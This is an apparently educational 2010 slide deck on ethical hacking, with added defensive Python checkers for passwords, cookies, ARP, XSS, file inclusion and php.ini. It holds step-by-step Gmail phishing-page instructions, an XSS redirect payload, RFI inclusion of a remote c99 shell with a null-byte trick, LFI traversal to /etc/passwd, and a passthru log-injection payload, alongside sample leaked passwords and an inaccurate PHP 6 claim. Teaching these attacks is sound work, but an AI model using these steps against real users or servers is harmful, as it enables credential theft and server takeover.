Ethical Hacking & Information Security
AK Dhamija
Introduction
Hacker
Password Hacking
Low Tech Methods
High Tech Methods
Countermeasures
Web Hacking
Techniques
Countermeasures
Network Hacking
Techniques
Countermeasures
Windows Hacking
Linux Hacking
Wireless Hacking
Malware
References
Ethical Hacking & Information Security: An Introduction
AK Dhamija
DIPR, DRDO
May 14, 2010
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 1 / 56
Overview
1 Introduction
  Hacker
2 Password Hacking
  Low Tech Methods
  High Tech Methods
  Countermeasures
3 Web Hacking
  Techniques
  Countermeasures
4 Network Hacking
  Techniques
  Countermeasures
5 Windows Hacking
6 Linux Hacking
7 Wireless Hacking
8 Malware
9 References
Introduction
Computer Security: CIA (Confidentiality, Integrity, Authentication)
Computer Security, Network Security, Information Security ... are OXYMORONS
Introduction: Hacked Passwords
Top ten most popular passwords (in that order) from among the 32 million hacked from RockYou.com: 123456, 12345, 123456789, Password, iloveyou, princess, rockyou, 1234567, 12345678, abc123
Imperva's study of "Consumer Password Worst Practices":
• About 30 percent of users chose passwords whose length is six characters or fewer.
• Moreover, almost 60% of users chose their passwords from a limited set of alphanumeric characters.
• Nearly 50% of users used names, slang words, dictionary words or trivial passwords (consecutive digits, adjacent keyboard keys, and so on).
Good Password Practices
• It should contain at least eight characters.
• It should contain a mix of four different types of characters: upper case letters, lower case letters, numbers, and special characters such as #$%&*,;". If there is only one letter or special character, it should not be either the first or last character in the password.
• It should not be a name, a slang word, or any word in the dictionary. It should not include any part of your name or your e-mail address.
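The three "Good Password Practices" rules above, turned into a checker as an added example (not from the slides). The banned list is a constructed stand-in holding only the RockYou top ten quoted above; a real deployment would load a full dictionary file.

```python
import re

# Constructed banned list: the RockYou top ten from the slide, lower-cased.
# A real checker would load a complete dictionary / breach list here.
COMMON_PASSWORDS = {
    "123456", "12345", "123456789", "password", "iloveyou",
    "princess", "rockyou", "1234567", "12345678", "abc123",
}


def character_classes(pw: str) -> dict:
    """Count how many characters of each of the slide's four classes the password has."""
    return {
        "upper": sum(c.isupper() for c in pw),
        "lower": sum(c.islower() for c in pw),
        "digit": sum(c.isdigit() for c in pw),
        "special": sum((not c.isalnum()) for c in pw),
    }


def check_password(pw: str, banned=COMMON_PASSWORDS, personal=()) -> list:
    """Return the list of rules the password violates; an empty list means it passes.

    personal: fragments of the user's name / e-mail address that must not appear."""
    problems = []

    # Rule 1: at least eight characters.
    if len(pw) < 8:
        problems.append("shorter than eight characters")

    # Rule 2: all four character classes present ...
    classes = character_classes(pw)
    missing = [name for name, n in classes.items() if n == 0]
    if missing:
        problems.append("missing character class(es): " + ", ".join(missing))

    # ... and a lone letter or lone special character must not sit at either end.
    letters = classes["upper"] + classes["lower"]
    if letters == 1 and (pw[0].isalpha() or pw[-1].isalpha()):
        problems.append("the only letter is the first or last character")
    if classes["special"] == 1 and (not pw[0].isalnum() or not pw[-1].isalnum()):
        problems.append("the only special character is the first or last character")

    # Rule 3a: not a dictionary / common password. Compare case-insensitively and
    # also after stripping digits and specials, so "Password1!" still trips the rule.
    core = re.sub(r"[^a-z]", "", pw.lower())
    if pw.lower() in banned or (core and core in banned):
        problems.append("is a common or dictionary password")

    # Rule 3b: no part of the user's name or e-mail address (fragments of 3+ chars).
    for fragment in personal:
        frag = fragment.lower()
        if len(frag) >= 3 and frag in pw.lower():
            problems.append(f"contains personal information '{fragment}'")
    return problems
```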
Introduction
Hacked Passwords
Ditalee, Ditalee1, Ditalee3iambhiku
pareekshanh84*sha1973******
peter1hemant
love25786080176
kingoforkutiloveyou
Introduction: Hacker
What is a Hacker?
A hacker is someone who likes to tinker with electronics or computer systems: finding ways to make them do what they do better, or do things they weren't intended to do.
Two types of Hacker
• White Hat:
  • Good guys
  • Don't use their skills for illegal purposes
  • Computer security experts who help protect people from the Black Hats
• Black Hat:
  • Bad guys
  • Use their skills maliciously for personal gain
  • Hack banks, steal credit cards, and deface websites
Introduction: Hacker Hierarchy
• Script kiddies:
  • Wannabe hackers
  • Have no hacking skills and use the tools developed by other hackers
  • No knowledge of what's happening behind the scenes
• Intermediate hackers:
  • Usually know about computers and networks, and have enough programming knowledge to understand what a script might do
  • Use pre-developed, well-known exploits (code that takes advantage of a bug or vulnerability) to carry out attacks
• Elite hackers:
  • Skilled hackers
  • Write hacker tools and exploits
  • Break into systems and hide their tracks
Introduction: Becoming a Hacker
What does it take to become a hacker?
Qualities needed
• Creativity
• Will to learn
• Knowledge is power
• Patience
• Programming (to be an elite hacker)
Password Hacking: Old Fashioned Low-Tech Methods
• Social Engineering
  • The hacker takes advantage of trusting human beings to get information from them
  • e.g. a ploy to install a new security update on your computer
• Shoulder surfing
• Guessing
  • Weak passwords like date of birth, phone number, favorite pet, etc.
Password Hacking: High Tech Methods
• Gmail system administrator's automatic responder
• Dictionary Attacks
• Brute Force Attacks
• Rainbow Tables
• Phishing
• GX Cookies
• ARP Poisoning
High-Tech Techniques: Gmail system administrator's automatic responder
High-Tech Techniques: Dictionary Attacks
• A text file full of commonly used passwords, or a list of every word from the dictionary, is used against a password database
• Brutus, a very common password cracker
High-Tech Techniques: Dictionary Attacks (continued)
IP masquerading, anonymous proxies and switching proxies are the techniques used to hide the IP address
High-Tech Techniques: Brute-force Attacks
• With time, brute-force attacks can crack any password
• Try every possible combination of letters, numbers, and special characters until the right password is found
High-Tech Techniques: Rainbow Tables
• A huge pre-computed list of hash values for every possible combination of characters
• A hash is a one-way function such as MD5
• "cheese" run through the MD5 algorithm gives fea0f1f6fede90bd0a925b4194deac11
• Having huge tables of every possible character combination hashed is a much better alternative to brute-force cracking
• Once the rainbow tables are created, cracking the password is a hundred times faster than brute-forcing it
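The lookup a precomputed table performs against unsalted MD5, next to the storage scheme that defeats it (a random per-user salt plus a slow key-derivation function), as an added example that is not part of the slides. The word list is constructed; PBKDF2-HMAC-SHA256 stands in for whatever the site would use. md5_hex("cheese") can be compared with the digest quoted above.

```python
import hashlib
import hmac
import os

# Constructed mini word list standing in for a rainbow table's input dictionary.
WORDLIST = ["cheese", "password", "iloveyou", "princess", "rockyou", "abc123"]

ITERATIONS = 200_000  # PBKDF2 work factor; tune so one hash costs ~100 ms on your hardware


def md5_hex(text: str) -> str:
    """Plain, unsalted MD5 as used on the slide."""
    return hashlib.md5(text.encode()).hexdigest()


def build_table(words) -> dict:
    """Precompute digest -> plaintext for every word. A real rainbow table stores
    hash chains instead of every pair, but the lookup idea is identical."""
    return {md5_hex(w): w for w in words}


def lookup(table: dict, digest: str):
    """Reverse a digest by table lookup; None when the digest is not in the table."""
    return table.get(digest)


def hash_password(password: str, salt: bytes = None) -> str:
    """Hardened storage: 'iterations$salt_hex$derived_hex'. A fresh random salt per
    password means no table built in advance contains this user's digest."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"{ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def demo():
    """Returns (table hit on unsalted MD5, table hit on salted hash,
    correct password verifies, wrong-case password verifies)."""
    table = build_table(WORDLIST)
    recovered = lookup(table, md5_hex("cheese"))        # the table wins instantly

    stored = hash_password("cheese")
    # The same table is useless against the salted hash: the derived key is not in it,
    # and every guess now costs ITERATIONS hash computations instead of one lookup.
    salted_hit = lookup(table, stored.split("$")[2])
    return recovered, salted_hit, verify_password("cheese", stored), verify_password("Cheese", stored)
```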
High-Tech Techniques: Phishing
• Stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you're not
• First the hacker chooses a target (Hotmail and Gmail)
• Go to www.gmail.com and click File -> Save page as ...
• Rename ServiceLogin.htm to index.htm
• PHP script that logs and stores your login details when you click "Sign in"
• Save this script into the same directory as you saved the Gmail page, and name it phish.php
• Create a new empty text file and name it list.txt
High-Tech Techniques: Phishing (the PHP script)
High-Tech Techniques: Phishing (continued)
• Open up the main Gmail page named index.htm with Notepad
• Look for the first occurrence of the word "action" in the script
• There are two "action" occurrences in the script, so make sure you have the right one by looking at the "form id" name above
• Change the link between action="" to phish.php. This will make the form submit to your PHP phish script instead of to Google
• After the link you will see the code
• Change the word "POST" to "GET" so that it looks like method="GET". This submits the information you type so that the PHP script can log it
• Save and close the file
• Upload the files to a free webhost that supports PHP
• Change the file permission of "list.txt" to 777
• http://www.yourwebhosturl.com/youraccount/list.txt will give you the username and password
High-Tech Techniques: GX Cookies
• Cookies are used by web browsers to store your user information so that you can stay logged into a website even after you leave. By stealing your cookie, the attacker can sometimes log in without knowing your password
• When users log into their Gmail account, the Gmail server sends a cookie (a text file) to the browser
• This file lets the Gmail server know that you are authenticated. The cookie keeps you logged in for 2 weeks unless you press sign-out or delete the cookie
• Even if you authenticated using SSL, you are still not secure afterwards, because the responses returned by the Gmail server travel over an unencrypted connection
• Every time you request anything from the Gmail server, such as an image, your browser sends this cookie to the Gmail server, and an attacker can easily capture it with any network sniffer tool
• The attacker thereby obtains your Gmail session ID, and with this session ID can log into your Gmail account without needing any username or password
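A check for the cookie attributes that close the gap described above (the session cookie riding along on plain-HTTP image requests, and staying valid for two weeks), as an added example that is not from the slides. The Set-Cookie headers are constructed; the SameSite check uses an attribute that postdates the talk.

```python
def parse_set_cookie(header: str) -> dict:
    """Split 'name=value; Attr; Attr=val' into the cookie name, its value and a
    lower-cased attribute dict (flag attributes such as Secure map to True)."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip() if v else True
    return {"name": name.strip(), "value": value, "attrs": attrs}


def audit_session_cookie(header: str) -> list:
    """Return findings for a session cookie; an empty list means the attributes the
    sniffing scenario above depends on are all in place."""
    attrs = parse_set_cookie(header)["attrs"]
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure: the cookie is also sent on plain-HTTP requests "
                        "(e.g. for images), where a network sniffer can capture it")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: the cookie can be read by injected script")
    if str(attrs.get("samesite", "")).lower() not in ("lax", "strict"):
        findings.append("missing SameSite=Lax or Strict")
    # The slide's cookie stays valid for two weeks; a stolen copy is replayable that long.
    max_age = attrs.get("max-age")
    if isinstance(max_age, str) and max_age.isdigit() and int(max_age) > 24 * 3600:
        findings.append(f"Max-Age={max_age}: a session cookie valid this long can be "
                        "replayed until it expires")
    return findings


# Constructed headers: a two-week cookie with no flags, and a hardened equivalent.
WEAK = "GX=CONSTRUCTED_SESSION_ID; Domain=mail.example.com; Path=/; Max-Age=1209600"
HARDENED = ("GX=CONSTRUCTED_SESSION_ID; Domain=mail.example.com; Path=/; "
            "Max-Age=3600; Secure; HttpOnly; SameSite=Lax")
```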
High-Tech Techniques: ARP Poisoning
• Address Resolution Protocol (ARP) is a Layer 2 protocol
• Allows an attacker to sniff data frames on a local area network (LAN), modify the traffic, or stop the traffic altogether
• The aim is to associate the attacker's MAC address with the IP address of another node (such as the default gateway)
• Any traffic meant for that IP address would be mistakenly sent to the attacker instead
• The attacker could then choose to forward the traffic to the actual default gateway (passive sniffing) or modify the data before forwarding it (man-in-the-middle attack)
• The attacker could also launch a denial-of-service attack against a victim by associating a nonexistent MAC address with the IP address of the victim's default gateway
• ARP spoofing attacks can be run from a compromised host, or from an attacker's machine that is connected directly to the target Ethernet segment
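Detection logic for the two symptoms the attack above leaves in a host's ARP cache (the gateway's IP suddenly mapping to a different MAC, and one MAC claiming several IPs), as an added example that is not from the slides. The ARP snapshots and the `arp -a` line are constructed; the addresses are placeholders.

```python
import re
from collections import defaultdict

GATEWAY_IP = "192.168.1.1"

# Constructed ARP cache snapshots (ip -> mac) taken a few seconds apart.
# In the second one the gateway resolves to the MAC of the .66 host.
SNAPSHOT_T0 = {
    "192.168.1.1": "00:11:22:33:44:01",    # gateway
    "192.168.1.20": "00:11:22:33:44:20",
    "192.168.1.66": "de:ad:be:ef:00:66",   # the host that later poisons the cache
}
SNAPSHOT_T1 = {
    "192.168.1.1": "de:ad:be:ef:00:66",    # gateway now answered by .66's MAC
    "192.168.1.20": "00:11:22:33:44:20",
    "192.168.1.66": "de:ad:be:ef:00:66",
}


def parse_arp_a(text: str) -> dict:
    """Parse Linux `arp -a` lines such as
    '? (192.168.1.1) at 00:11:22:33:44:01 [ether] on eth0' into ip -> mac."""
    table = {}
    for line in text.splitlines():
        m = re.search(r"\((\d+\.\d+\.\d+\.\d+)\) at ([0-9a-fA-F:]{17})", line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def find_anomalies(before: dict, after: dict, gateway_ip: str) -> list:
    """Compare two snapshots and flag:
    1. any IP whose MAC changed (the gateway is called out explicitly);
    2. any MAC that now claims two or more IP addresses."""
    alerts = []
    for ip, mac in after.items():
        old = before.get(ip)
        if old and old != mac:
            tag = "GATEWAY " if ip == gateway_ip else ""
            alerts.append(f"{tag}MAC changed for {ip}: {old} -> {mac}")

    by_mac = defaultdict(list)
    for ip, mac in after.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append(f"MAC {mac} claims several IPs: {', '.join(sorted(ips))}")
    return alerts
```

A static ARP entry for the gateway, as the countermeasures slide suggests, makes the first check redundant on that host; the second still catches poisoning aimed at other nodes.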
Password Hacking: Countermeasures
Social Engineering
• Ask some questions that he should be able to answer to establish his legitimacy
• Some professionals study the company before attacking, so they might know all the answers
• In case of doubt, you should ask the head of whatever department the attacker claims to be from
Shoulder Surfing
• Make sure there is no one behind you attempting to peek
• Don't keep any sticky notes lying around that have your password or password hints on them
Guessing
• Never use a password like your birth date, your mother's maiden name, your pet's name, your spouse's name, or anything that someone may be able to guess
Gmail system administrator's automatic responder
• Don't fall prey to such tactics
• Don't respond to mails if you can't identify the sender
Password Hacking: Countermeasures (continued)
Dictionary Attacks
• Don't use a password that is in the dictionary
• If you use a word from the dictionary but replace most of the letters with numbers, you are not safe: a 1337-speak dictionary changes a word like "animal" to 4n1m41
• Use something like doyoulikecheese?88
Brute-force Attacks
• Create a very long password using many numbers and odd characters
• Creating a phrase for your password is your best option for staying secure
Rainbow Tables
• Creating tables for passwords that are long takes a very long time and a lot of resources
Phishing
• Beware of gmail.randomsite.com or gamilmail.com
• When you are on the real Gmail website, the URL should begin with www.google.com; anything else is a fake
Password Hacking: Countermeasures (continued)
GX Cookies
• Do not use Gmail from public places, cybercafes and public wireless hotspots
• Always use https://mail.google.com because this accesses the SSL version of Gmail; it is persistent over your entire session and not only during authentication
ARP Poisoning
• Static ARP inspection (SARPI) or dynamic ARP inspection (DARPI) approach on switched or hubbed LANs with or without DHCP
• Always use https://mail.google.com because this accesses the SSL version of Gmail; it is persistent over your entire session and not only during authentication
Password Cracking: Other Programs
• Cain and Abel
• John the Ripper
• THC Hydra
• SolarWinds
• RainbowCrack
Web Hacking: Techniques
• Cross Site Scripting (XSS)
• Remote File Inclusion (RFI)
• Local File Inclusion (LFI)
Web Hacking: Cross Site Scripting (XSS)
• User inputs malicious data into a website
• Affected sites: FBI, CNN, eBay, Apple, Microsoft, and AOL
• Features commonly vulnerable to XSS attacks are:
  • Search engines
  • Login forms
  • Comment fields
• Three types of XSS attacks
  • Local
    • Rarest and hardest to pull off
    • Requires an exploit for a browser
    • The hacker can install worms, spambots, and backdoors onto your computer
  • Non-Persistent
    • The most common type of attack; doesn't harm the actual website
    • A client-side script or HTML is inserted into a variable, which changes the output that the user sees
    • Only activated when the user visits the URL crafted by the attacker
  • Persistent
    • Steal website cookies
    • Deface the website
    • Spread worms
Web Hacking: Cross Site Scripting (XSS)
XSS: How can we tell whether the site is vulnerable?
• If there is a search field, enter a word; if that word is displayed back to you on the next page, there's a chance it is vulnerable
• Search for <h1>hi</h1>, and if the word "hi" is output as a big header, it is vulnerable
• Search for <script>alert("hi");</script>; if the word "hi" pops up in a popup box, then the site is vulnerable to XSS
• These examples are non-persistent. Now if the hacker finds a guestbook etc., he can make it persistent, and everyone that visits the page would get the above alert if it was part of his comment
XSS for Phishing
We want to craft a link pointing to the legitimate website (www.victim-site.com) that redirects to the phishing website
• When JavaScript is inserted into the search box, a URL was formed that looked like
• The code we typed into the search box was passed to the "searchbox" variable
• Replace everything in between ?searchbox= and &search with the JavaScript code <script>window.location="http://phishing-site.com"</script>
• Now when you go to the finished link, the legitimate site will redirect to the phishing website
• Encode the URL to make it look more legit - http://www.encodeurl.com/
• It may look something like http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location+%3D+%5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21
• Once the victim sees that the link points to the legitimate website, he will be more likely to fall for the phishing attack
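The reflected search page from the two XSS slides above in its vulnerable and escaped forms, plus the defender's decoding of the obfuscated link quoted on this slide, as an added example that is not part of the slides. The page template is constructed; the encoded URL is the one quoted above.

```python
import html
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed stand-in for the search results page that echoes the "searchbox" value.
TEMPLATE = "<p>You searched for: {term}</p>"


def render_vulnerable(term: str) -> str:
    """Reflects the raw term: the <h1> and <script> probes above become live markup."""
    return TEMPLATE.format(term=term)


def render_safe(term: str) -> str:
    """Output-encodes the term so the browser shows it as text, never parses it as HTML.
    html.escape turns <, >, &, " and ' into entities; this is the fix for the
    non-persistent case described above."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


def decode_link(url: str) -> dict:
    """Defender's view of a percent-encoded link: decode it, split out the host and the
    query parameters, and flag parameter values that carry script."""
    decoded = unquote(url)
    parts = urlsplit(decoded)
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    suspicious = any("<script" in v.lower() or "javascript:" in v.lower()
                     for v in params.values())
    return {"host": parts.netloc, "params": params, "suspicious": suspicious}


# The encoded link quoted on the slide: the host looks harmless, the payload is hidden.
ENCODED = ("http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location+%3D+"
           "%5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21")
```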
Web Hacking: Remote File Inclusion (RFI)
RFI: How can we tell whether the site is vulnerable?
• A remote file, usually a shell, is included into a website, which allows the hacker to execute server-side commands as the currently logged-on user and have access to files on the server
• Many servers are vulnerable to this kind of attack because of PHP's default settings of register_globals and allow_url_fopen being enabled
• From PHP 6.0 onwards, register_globals has been deprecated
RFI: Exploiting the vulnerability
• First the hacker would find a website that gets its pages via the PHP include() function and is vulnerable to RFI
• Many hackers use Google dorks to locate servers vulnerable to RFI
• A Google dork is the act of using Google's provided search tools to help get a specific search result, e.g. allinurl:.php?page= looks for URLs with .php?page= in them
• To get relevant sites, switch around the word "page" with other letters and similar words
• Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems, and search for websites that are running that vulnerable web application with a Google dork
• Websites that include pages have a navigation system similar to: http://target-site.com/index.php?page=PageName
• To see if the page is vulnerable, the hacker would try to include a site instead of PageName, like http://target-site.com/index.php?page=http://google.com
• If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell
Web Hacking: Remote File Inclusion (RFI) (continued)
RFI: Exploiting the vulnerability
• The most popular shells are c99 and r57. A hacker would either upload them to a remote server or just use a Google dork to locate them already online and insert them (search inurl:c99.txt)
• This will display many websites with the shell already up and ready to be included. At the end of the URL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems
• The new URL with the shell included would look like http://target-site.com/index.php?page=http://site.com/c99.txt?
• Sometimes the PHP script on the server appends ".php", but "c99.txt.php" would not work
• To get around this, you would add a null byte (%00) to the end of c99.txt. This tells the server to ignore everything after c99.txt
• If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen
Web Hacking Techniques
Remote File Inclusion (RFI)
RFI : Exploiting the vulnerability• The shell will display information about the remote server and list all the files and directories on it.
• From here the hacker would find a directory that has read and write privileges
• Upload the shell as a .php file so that incase the vulnerability is fixed, he will be able to access itlater on
• Root privileges become vulnerable now by uploading and running local exploits against the server
• He could also search the victim server for configuration files. These files may contain username andpasswords for the MYSQL databases etc
Web Hacking Techniques
Local File Inclusion (LFI)
LFI : How can we say whether the site is vulnerable
• When you have the ability to browse through the server by means of directory traversal (discover the /etc/passwd file)
• Vulnerable sites are found similarly to RFI (www.target-site.com/index.php?p=../../../../../../../etc/passwd)
• The /etc/passwd file displays each line as username:passwd:UserID:GroupID:full name:directory:shell
• eg root:x:0:0::/root:/bin/bash
• If the password hash was shown, the hacker would be able to crack it and get access to the machine
• If the password is shadowed and in the /etc/shadow file, which the hacker doesn't have access to, then he may get access to the system through log injection
• The log directories are located in different areas in different Linux distributions (find error.log, access.log, error_log, access_log etc)
LFI : Gaining access to the system through log injection
• Search for the OS version of the target server, then search where the log files are located on that OS
• The hacker would then inject some PHP code into the logs by typing <? passthru($_GET['cmd']) ?> after = in the URL
• This will cause the PHP script to be logged because there is no file by that name. This script will give the hacker shell access and allow him to execute system commands
• If you go back to the log file, you will see that the PHP script wasn't parsed and was instead converted to %3C?%20passthru($_GET[cmd])%20?%3E
• When we submitted the script, the browser automatically encoded the URL. We can use a Perl script that can get around this problem.
Web Hacking Techniques
Local File Inclusion (LFI)
LFI : Gaining access to the system through log injection
• Edit the variables site, path, code, and log to the appropriate information
• Once the hacker runs this script and it goes successfully, he can run any command on the server.
• From here he can run any local exploits to gain root, or just browse the server files
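The RFI and LFI slides above describe four things an include parameter can carry: a remote URL with a trailing ?, a %00 null byte, a ../ traversal, and a URL-encoded <? passthru(...) ?> that lands in the access log. As an added, defender-side example (Python written for this page, not code from the slides or the sites they cite), the block below classifies a page parameter on exactly those indicators, resolves it only through an allow-list, and runs the same classifier over constructed Apache-style access log lines, URL-decoding first so the encoded form in the log is still caught. The allow-list names, the pages directory and the log lines are assumptions of the example.

```python
from __future__ import annotations

import os
import re
from urllib.parse import unquote, urlsplit

# Assumption of this example: the templates that index.php?page= may load are
# registered by name here. Nothing outside this table is ever passed to include().
ALLOWED_PAGES = {"home": "home.php", "about": "about.php", "contact": "contact.php"}

# Stream wrappers that reach beyond the local filesystem.
REMOTE_SCHEMES = {"http", "https", "ftp", "php", "data"}

# PHP opening tags and the execution functions a log-injection payload relies on.
PHP_CODE_RE = re.compile(
    r"<\?(?:php\b|=|\s)|\b(?:passthru|system|shell_exec|exec|eval)\s*\(", re.I
)


def inclusion_flags(raw_value: str) -> set[str]:
    """Return the inclusion-attack indicators present in one parameter value.

    The value is URL-decoded first: PHP sees the decoded form, while the web server
    logs the encoded form (%3C?%20passthru(...)%20?%3E), so decoding lets one check
    serve both the live request and the log line.
    """
    value = unquote(raw_value)
    flags: set[str] = set()
    if "\x00" in value:                      # %00 trick to cut off an appended ".php"
        flags.add("null-byte")
    if PHP_CODE_RE.search(value):            # code meant to run from a poisoned log
        flags.add("code-injection")
    if urlsplit(value).scheme in REMOTE_SCHEMES or value.startswith("//"):
        flags.add("rfi")                     # remote file inclusion
    parts = value.replace("\\", "/").split("/")
    if value.startswith("/") or ".." in parts:
        flags.add("lfi")                     # absolute path or directory traversal
    return flags


def resolve_page(raw_value: str, pages_dir: str) -> str:
    """Map ?page= to a file inside pages_dir, or raise ValueError.

    The allow-list is the real fix; the realpath containment check is defence in
    depth against a future edit that starts building paths from the parameter.
    """
    flags = inclusion_flags(raw_value)
    if flags:
        raise ValueError(f"rejected page parameter {raw_value!r}: {sorted(flags)}")
    if raw_value not in ALLOWED_PAGES:
        raise ValueError(f"page {raw_value!r} is not on the allow-list")
    base = os.path.realpath(pages_dir)
    path = os.path.realpath(os.path.join(base, ALLOWED_PAGES[raw_value]))
    if os.path.commonpath([base, path]) != base:
        raise ValueError("resolved path escapes the pages directory")
    return path


# Apache common-log-format request line, enough to pull out client IP and target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def request_target_flags(target: str) -> set[str]:
    """Flags for a logged request target (path plus query string)."""
    # The whole target always starts with "/", so check it only for the two
    # indicators that are meaningful anywhere in the URL; the rest are per-parameter.
    flags = inclusion_flags(target) & {"null-byte", "code-injection"}
    _, _, query = target.partition("?")
    for pair in query.split("&") if query else []:
        _, _, value = pair.partition("=")
        flags |= inclusion_flags(value)
    return flags


def scan_access_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client_ip, request_target, sorted_flags) for every suspicious line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        flags = request_target_flags(m["target"])
        if flags:
            findings.append((m["ip"], m["target"], sorted(flags)))
    return findings


# Constructed sample log lines (not captured from any real server).
SAMPLE_LOG = """\
10.0.0.5 - - [14/May/2010:10:01:02 +0530] "GET /index.php?page=home HTTP/1.1" 200 5120
10.0.0.9 - - [14/May/2010:10:01:07 +0530] "GET /index.php?page=http://site.com/c99.txt? HTTP/1.1" 200 8833
10.0.0.9 - - [14/May/2010:10:01:15 +0530] "GET /index.php?page=http://site.com/c99.txt%00 HTTP/1.1" 200 8833
10.0.0.9 - - [14/May/2010:10:02:01 +0530] "GET /index.php?p=../../../../../../../etc/passwd HTTP/1.1" 200 1934
10.0.0.9 - - [14/May/2010:10:02:30 +0530] "GET /%3C?%20passthru($_GET[cmd])%20?%3E HTTP/1.1" 404 289
"""

if __name__ == "__main__":
    for ip, target, flags in scan_access_log(SAMPLE_LOG):
        print(f"{ip:10} {','.join(flags):22} {target}")
```

The last sample line is the log-injection attempt from the slide: it returns 404, so it is easy to dismiss as noise, but once decoded it is PHP source, which is the signal worth alerting on. Note that the detector only works because it decodes before matching; matching the raw log text for "<?" would miss it.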
Web Hacking Countermeasures
Web Hacking
Countermeasures
• Make sure you are using up-to-date scripts
• Make sure your server's php.ini file has register_globals and allow_url_fopen disabled
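To check the second countermeasure on an actual php.ini rather than by eye, here is an added Python example (written for this page, not from the slides): a minimal php.ini reader and an audit that reports which of the directives are still enabled. It also checks allow_url_include, which PHP 5.2 and later use to gate include()/require() of URLs separately from plain allow_url_fopen file reads; the two ini fragments are constructed for the demonstration.

```python
from __future__ import annotations

# Directives to check, and whether each one is On when absent from php.ini.
# register_globals and allow_url_fopen are the two the slide names;
# allow_url_include (PHP 5.2+) is the one that directly controls include() of URLs.
BUILTIN_DEFAULT_ON = {
    "register_globals": False,   # Off by default since PHP 4.2, removed in PHP 5.4
    "allow_url_fopen": True,     # On by default
    "allow_url_include": False,  # Off by default
}

# Spellings php.ini accepts for a false boolean.
FALSY = {"off", "0", "false", "no", "none", ""}


def parse_php_ini(text: str) -> dict[str, str]:
    """Minimal php.ini reader: drops ';' comments, [sections] and blank lines and
    keeps the last assignment of each directive, with surrounding quotes removed."""
    settings: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def audit_php_ini(text: str) -> list[tuple[str, str]]:
    """Return (directive, effective_value) for each checked directive that is still
    enabled; effective_value is "<unset>" when PHP's built-in default applies."""
    settings = parse_php_ini(text)
    problems = []
    for directive, default_on in BUILTIN_DEFAULT_ON.items():
        if directive in settings:
            value = settings[directive]
            enabled = value.lower() not in FALSY
        else:
            value = "<unset>"
            enabled = default_on
        if enabled:
            problems.append((directive, value))
    return problems


# Constructed php.ini fragments for the demonstration.
WEAK_INI = """\
[PHP]
register_globals = On
allow_url_fopen = On
; allow_url_include not mentioned, so PHP's default applies
"""

HARDENED_INI = """\
[PHP]
register_globals = Off
allow_url_fopen = Off
allow_url_include = Off
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit_php_ini(ini) or "no findings")
```

On PHP 5.4 and later register_globals no longer exists, so it is simply absent, which the audit treats as Off, the same as PHP does. An empty php.ini is still reported, because allow_url_fopen is On unless explicitly disabled.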
Network Hacking
Network Hacking
Techniques
• Footprinting
• Port Scanning
• Banner Grabbing
• Searching for Vulnerabilities
• Penetrating
Network Hacking Techniques
Footprinting
Footprinting
• To hack a system the hacker must first know everything there is to know about it
• Gathering information about a computer system and the companies it belongs to
Footprinting Steps
• A hacker would start by gathering information on the target's website. Things to look for are e-mails and names
• Get the IP address of the website
• Ping the server to see if it is up and running
• Do a Whois lookup on the company website. Go to http://whois.domaintools.com and put in the target website
• You see the company e-mails, address, names, when the domain was created, when the domain expires, the domain name servers, and more!
• A hacker can also take advantage of search engines to search sites for data
• "site:www.the-target-site.com" will display every page that Google has of the website
• "site:www.the-target-site.com email" will list several emails that are published on the website
• "inurl:robots.txt" would look for a page called robots.txt, which lists all the directories and pages on the website that they wish to keep hidden from the search engine spiders
Network Hacking Techniques
Port Scanning
Port Scanning
• To detect the services listening on the server's open ports, so as to detect vulnerabilities
• The Nmap Security Scanner is available for both Mac and Windows users: http://nmap.org/download.html
Port Scanning Steps
• Choose a target and place it in the target box
• Choose the "Profile"
Network Hacking Techniques
Port Scanning
Port Scanning Steps
• A sample scan result may look like
• List of some of the most popular ports/services on the internet
• The hacker also needs to find out what operating system the server is running (visiting a non-existent page gives a 404 error page which shows the OS)
Network Hacking Techniques
Banner Grabbing
Banner Grabbing
• To find out the software and its version, which is needed to search for vulnerabilities
Banner Grabbing Steps
• Telnet into the service port to figure out what software and version of the service is running
